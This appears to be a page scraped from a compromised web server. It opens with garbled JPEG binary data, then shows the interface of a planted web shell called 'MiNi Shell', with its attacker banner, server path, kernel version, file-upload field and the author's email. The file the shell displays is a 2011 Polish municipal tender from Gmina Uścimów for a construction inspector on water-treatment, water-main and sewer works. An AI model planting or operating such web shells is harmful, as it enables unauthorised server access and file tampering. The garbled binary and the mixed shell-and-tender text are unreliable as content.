JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111201/406430-N-2011.html

<p class="kh_header"><b>Stary Uścimów: Pełnienie obowiązków Inspektora Nadzoru nad realizacją operacji pn: Przebudowa i remont stacji  uzdatniania wody w miejscowości Drozdówka, budowa sieci wodociągowej Stara Jedlanka- Drozdówka, oraz II etap budowy kanalizacji sanitarnej w miejscowości Stara Jedlanka</b><br>
<b>Numer ogłoszenia: 406430 - 2011; data zamieszczenia: 01.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Uścimów , 21-109 Stary Uścimów, woj. lubelskie, tel. 081 8523026, faks 081 8523026.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uguscimow.bip.e-zeto.eu/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Inspektora Nadzoru nad realizacją operacji pn: Przebudowa i remont stacji  uzdatniania wody w miejscowości Drozdówka, budowa sieci wodociągowej Stara Jedlanka- Drozdówka, oraz II etap budowy kanalizacji sanitarnej w miejscowości Stara Jedlanka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Pełnienie obowiązków Inspektora Nadzoru nad realizacją 
    operacji pn: Przebudowa i remont stacji  uzdatniania wody w miejscowości Drozdówka, 
    budowa sieci wodociągowej Stara Jedlanka- Drozdówka, oraz II etap budowy kanalizacji 
    sanitarnej w miejscowości Stara Jedlanka - szczegółowo opisanej w pkt.5; w zakresie 
    dotyczącym wykonania robót  budowlanych zgodnie z dokumentacja projektową, 
    obowiązującymi przepisami, a także umową na roboty budowlane. Zamówienie obejmuję 
    kontrolę wykonanych robót budowlanych z upoważnienia Zamawiającego w sposób stały 
    podczas prowadzenia prac budowlanych, a także kontrolę rozliczeń budowy pod względem 
    ilościowym i finansowym oraz przygotowanie  i udział w czynnościach  odbioru 
    końcowego operacji od Wykonawcy oraz przeglądu pogwarancyjnego zamówienia.
2. Przebywanie na budowie co najmniej 3 razy w tygodniu
3. Funkcję inspektora nadzoru inwestorskiego należy pełnić zgodnie z obowiązującymi 
    przepisami, normami, na warunkach ustalonych w umowie oraz stosownie do wymagań 
    wynikających ze współfinansowania inwestycji będącej przedmiotem nadzoru ze środków 
    Programu Rozwoju Obszarów Wiejskich 2007-20013.
4. Do podstawowych praw i obowiązków Inspektora Nadzoru należą również prawa i 
    obowiązki  w zakresie określonym w 25 i 26 ustawy z dnia 7 lipca 1994r, - Prawo 
    Budowlane ( tj. Dz.U.z 2006r. nr 156, poz. 1118 z późń.zm.)tj:
reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,
sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych, oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazania ich do użytkowania,
potwierdzenie faktycznie wykonanych robót oraz usunięcie wad, a także , na żądanie inwestora kontrolowanie rozliczeń budowy,
wydawanie kierownikowi budowy lub robót polecenia potwierdzonego wpisem w dziennik budowy dotyczącego: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych , oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
żądania od kierownika budowy lub robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie lub spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
5. Inwestycja dla której będzie prowadzony nadzór swoim zakresem obejmuje: 
    * przebudowa i remont stacji uzdatniania wody w miejscowości Drozdówka
       Remont stacji uzdatniania wody w miejscowości Drozdówka polegający na wymianie urządzeń technologicznych dla zdolności produkcji wody uzdatnionej w ilości  Q h= 35m3 h, obejmujący wymianę urządzenia hydroforowego - 2 szt ,i na zestaw hydroforowy  o wydajności Q =40m3/h z pompą płuczną o wydajności Q =93,6m3 h , wymianę odżelaziaczy i przewodów instalacji technologicznej, instalacji spędzonego powietrza, instalacji dozowania chloru.
Zgodnie z założeniami technologicznymi linia uzdatniania wody składać się będzie z dwóch  filtrów ciśnieniowych o średnicy 1600 mm o powierzchni filtracyjnej jednego filtra 2,0 m3  wypełnionych złożem mieszanym: kwarcowym i katalitycznym z aeratorem o średnicy 800mm. Filtry ciśnieniowe wykonane ze stali niskowęglowej pracować będą automatycznie dzięki wyposażeniu w komplet zaworów hydraulicznych i sterownikiem A148 z programatorem czasowym i rozdzielaczem do sterowania układem zaworów w odżelaziaczu. Płukanie złoża  pompą płuczną, z odprowadzeniem ścieków z płukania do istniejącego osadnika i do stawu. Wykonanie instalacji sprężonego powietrza z rur ze stali nierdzewnej. Woda surowa napowietrzana będzie za pomocą sprężarki, a zruszenie złoża w filtrach za pomocą dmuchawy. 
Zakres robót budowlanych obejmuje następujące roboty: Wymianę pokrycia dachowe z eternitu na blachę falistą z wymiana  elementów więźby dachowej, ołacenia  połaci dachowej - 1126,70 m2,  wymiana stolarki okiennej -8 szt., wymiana stolarki drzwiowej zewnętrznej- 1 szt, i wewnętrznej- 3 szt. Licowanie ścian płytkami ceramicznymi ( glazura) na klej - 110,86 m2, posadzki z płytek ceramicznych  GRES na klej  - 81,60m2, cokolik 10 cm  z płytek ceramicznych GRES na klej- 25,06m, malowanie farba emulsyjna ścian i sufitów- 149,22 m2, ocieplenie budynku styropianem grubości 10cm z wykonanie wyprawy elewacji z gotowej suchej mieszanki - 153,97m2, wymiana obróbek blacharskich z blachy. Wykonanie fundamentów pod zbiorniki wyrównawcze - 20,00m3 . Dostawa i montaż zbiorników wyrównawczych stalowych 50 m3 każdy - 2 szt.    Wykonanie chodnika i opaski z kostki brukowej na podsypce cementowo-piaskowej - 60, 4 m2, oraz drogi wewnętrznej z kostki brukowej 8cm na podsypce cementowo- piaskowej - 182,00m2, wymiana ogrodzenia z siatki - 168 m. 
Zakres robót technologicznych obejmuje: demontaż hydroforów o poj. 2500 dm3 - 2 kpl, demontaż odżelaziaczy D 1500 - 2 kpl, demontaż aeratora - 2 kpl.,  demontaż instalacji technologicznej z rur stalowych o śr. 70 - 114mm z armatura - 70,0m,
Montaż odżelaziaczy D=1600 - 2kpl, montaż aeratora D 800 - 1 szt. ,montaż zestawu hydroforowego o wydajności Q =40m3 h - 1 szt, wykonanie rurociągów technologicznych z rur PCW-U,PN10 o śr. 63-160 z armaturą - 99m, wykonanie instalacji sprężonego powietrza z armatura z rur ze stali nierdzewnej Dn 25-32mm - 67 m, montaż sprężarki bezolejowej o wyd. 245dm3/min - 1 szt., montaż dmuchawy o wyd. 126 m3 h, wykonanie instalacji dozowania chloru z rur PCW-U, PN-10 o śr. 25 mm- 16m, montaż chloratora C 52 - 1 kpl. wymiana umywalki - 1 szt, wymiana ustępu z  płuczką - 1szt.,wymiana podgrzewacza wody - 1 szt, montaż wentylatora dachowego - 1 szt.  
Zakres robót w zakresie instalacji elektrycznej obejmuje: wykonanie przyłącza kablowego 5 żyłowego o przekroju żył 120 mm - 160 mb,  wymiana linii kablowych zalicznikowych,  wymiana tablicy rozdzielczej głównej - 1 kpl, wymiana instalacji oświetleniowej i gniazd wtykowych 230,24V,  instalacji siły i odbiorów technologicznych - 1 kpl.
Planowany termin wykonania robót budowlanych przez Wykonawcę do dnia 15 października 2012r.

   *  Budowa Sieci wodociągowej Stara Jedlanka - Drozdówka
Zakres robót w zakresie sieci wodociągowej Stara Jedlanka- Drozdówka  obejmuje: wykonanie sieci wodociągowej z rur PVC PN 10SDR26, 110-4,2 mm do wody pitnej o długości 1093m, z przyłączeniem do istniejącej sieci z rur PCV 110, za pomoca zasuwy wodociągowej. Na trasie sieci wodociągowej wykonane zostaną 4 hydranty nadziemne p. pożarowe DN80. 
Planowany termin wykonania robót budowlanych przez Wykonawcę do dnia 15 października 2012r r.

   *  Budowa kanalizacji sanitarnej w miejscowości Stara Jedlanka 
Przedmiotem zamówienia jest budowa kanalizacji sanitarnej ciśnieniowej o łącznej długości 6 655 mb o następującym zakresie robót:                        
* sieci kanalizacyjna ciśnieniowa z rur PE O 90                3 213 m,
* sieci kanalizacyjna ciśnieniowa z rur PE O 75                1 966 m,
* sieci kanalizacyjna ciśnieniowa z rur PE O 63                   255 m,
* sieci kanalizacyjna ciśnieniowa z rur PE O 50                1 221 m,
* przyłącze kanalizacyjne                                           51szt. 162m,
   w tym: ieć grawitacyjna z rur PCV O 160                          162 m
* zasuwy sekcyjne  dn    80                                                      14 szt.
* zasuwy sekcyjne  dn    63                                                      54 szt.                
* przepompownie przydomowe dn 900                                   51 szt.
* hydranty płuczące                                                                    6 szt.
* przepompownia  pośrednia                                                     1 szt.  w tym:
   - przyłącze energetyczne                                                       49 m
   - przyłącze wodociągowe  PCV 90                                        36 m
   - utwardzenie z kostki betonowej 8 cm                                  70 m
   - ogrodzenie plus brama i furtką                                             36 m    
   Planowany termin wykonania robót budowlanych przez Wykonawcę do dnia15 października 2012r.

Szczegółowy opis inwestycji zawiera dokumentacja projektowa,  przedmiary robót oraz  specyfikacja techniczna wykonania i odbioru robót budowlanych , z którymi obowiązkowo należy się zapoznać przed złożeniem oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę  2 000,00 PLN (słownie: dwa tysiące złotych),
2.  Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w  
     dziale XIII ust.1 SIWZ tj.   do dnia 12 grudnia 2011r. do godz. 1100.
3.  Wadium może być wnoszone w następujących formach:
a)  w pieniądzu, przelewem na rachunek bankowy Zamawiającego nr rachunku: Bank Spółdzielczy Łęczna O/Uścimów, NR: 72 8693 0006 0000 0332 2006 0003
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)  gwarancjach bankowych,
d)  gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 4 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami).
f)  w przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
Okoliczności i zasady zwrotu wadium, jego przepadku  określa art. 46 ustawy pzp . Zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa.
Wadium wnoszone w formie gwarancji bankowej lub ubezpieczeniowej należy dołączyć do oferty w oddzielnej kopercie umożliwiającej złożenie jej w depozycie kasowym oraz późniejszy zwrot Wykonawcy.
         Do oferty należy dołączyć kopię wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) oferent musi być uprawniony do występowania w obrocie prawnym;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentują pełnienie usługi funkcji Inspektora Nadzoru w okresie ostatnich 3 latach 
      przed dniem  wszczęcia  postępowania  na  2  inwestycjach  w tym:  
a) 1 inwestycji polegającej na budowie (budowie, remoncie, przebudowie 
            lub modernizacji) stacji uzdatniania wody o zdolności produkcji wody uzdatnionej w 
            ilości  nie mniejszej niż  Q h=35m3/h, 
      b)  1 inwestycji polegającej  na budowie  sieci kanalizacyjnej sanitarnej (grawitacyjnej                
            ( ciśnieniowej,  podciśnieniowej) o długości  nie mniejszej niż 5500 mb z 
            przyłączami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować 3 osobami posiadającymi kwalifikacje odpowiednie do   
     stanowisk, które zostaną im powierzone:
    -  w branży sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych - wymagane co 
       najmniej 10 letnie doświadczenie zawodowe w kierowaniu  i nadzorowaniu robotami 
      oraz  posiadanie uprawnień do wykonywania samodzielnych funkcji w budownictwie w 
      specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 
      wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych-bez ograniczeń.
    - w branży konstrukcyjno - budowlanej - wymagane co najmniej 5 letnie doświadczenie 
      zawodowe w kierowaniu  i nadzorowaniu robotami  oraz wymagane posiadanie 
      uprawnień do wykonywania samodzielnych funkcji w budownictwie w specjalności 
      konstrukcyjno - budowlanej,
     - w branży sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych - wymagane 
       co najmniej 5 letnie doświadczenie  zawodowe w kierowaniu  i nadzorowaniu robotami  
       oraz wymagane posiadanie uprawnień do wykonywania samodzielnych funkcji w  
       budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  
       elektrycznych i elektroenergetycznych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uguscimow.bip.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Urzędzie Gminy w Uścimowie
 Stary Uścimów 37
 21-109 Uścimów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 11:00, miejsce: W Urzędzie Gminy w Uścimowie
 Stary Uścimów 37
 21-109 Uścimów
pokój Nr 5 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach programu PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com